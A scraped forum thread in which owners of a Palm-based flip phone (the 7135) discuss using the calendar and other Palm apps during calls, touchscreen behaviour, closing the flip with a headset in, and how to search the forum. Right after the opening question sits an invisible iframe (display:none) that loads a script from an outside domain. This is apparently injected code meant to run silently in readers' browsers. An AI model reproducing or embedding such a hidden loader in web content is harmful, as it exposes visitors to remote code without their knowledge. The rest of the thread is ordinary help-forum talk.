can you use the 'Palm' function while talking

Probably asked somewhere else, but I was wondering if you can use the Palm calendar and make entries while talking on the phone using an ear bud? Also, can you go online while on the phone? Is there anything you CANNOT do while talking that potential buyers should be aware of?

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yes, you can definitely use Palm apps (i.e. calendar, address book, todo, doodling, etc.) while on the phone via ear buds OR the excellent speakerphone.

However, you can't go online while on the phone.

Welcome to the forum.

And yes, it has been asked and answered before, but only once by me, so I won't ride you TOO hard for not trying to search first....

how do you search

I tried searching through the threads with no luck. Is there a yahoo-like search function?

Not sure I know what you mean by a "yahoo-like" search function, but if you click on the Search button in the button bar in the upper right hand side of every forum page, it will bring up the search page.

I found that you cannot use the Palm functions when you are using the 7135 as a modem.

I think he means "can you yell at the computer until it gives you an answer you like".

Doesn't work with my PC or any of the Sprint sales reps I have spoken with

I love quoting out of context

I may know what he means.
My tip:
The search offers an options to "view results as posts" rather than "view as threads" (something like that). If you choose "view as posts", the results return the individual posts that matched your query. Otherwise, you end up searching entire threads, which is why I often don't use the default (view as threads).

So what does it mean that the touchscreen doesn't work when on a call?

This too, has been asked and answered.... A search of "touchscreen AND call" would have found your answer.

OK, I tried a search and didn't find anything. What happens if your using the palm and you receive a call? Or, what if you're listening to an MP3 and you receive a call?
BTW, the advanced features of this forum are mysterious to newbies--at least to me.
Thanks for the good info and support group!

What happens if a call comes in while using Palm

It will switch to "phone mode" automatically, showing the caller id and the standard phone screen when a call comes in. You can resume your Palm application after the call, or even in the middle of it. (Yes, you can use the Palm function in the middle of a call. The speakerphone functionality or a headset come in very handy here.)

Now, now Alan...let's make all newcomers feel unconditionally welcomed. We all have to learn new things, but it makes it easier if we don't have members "riding" newbies.

Hey Sneider, welcome to the board brah!

using email and calendar

I assume that when you are reading your email, you can toggle between the email and the calendar fairly easily, say to confirm availability for a meeting.

Is this true?

Close flip without losing the call?

If I am on a voice call with the flip open (while using the ear bud), is there any way to close the flip without hanging up the call? I did a few searches but did not find this. Thanks!

Good Question.... I had to try it out in ordder to answer you. As long as you have a headset plugged in, closing the flip will not disconnect the call.
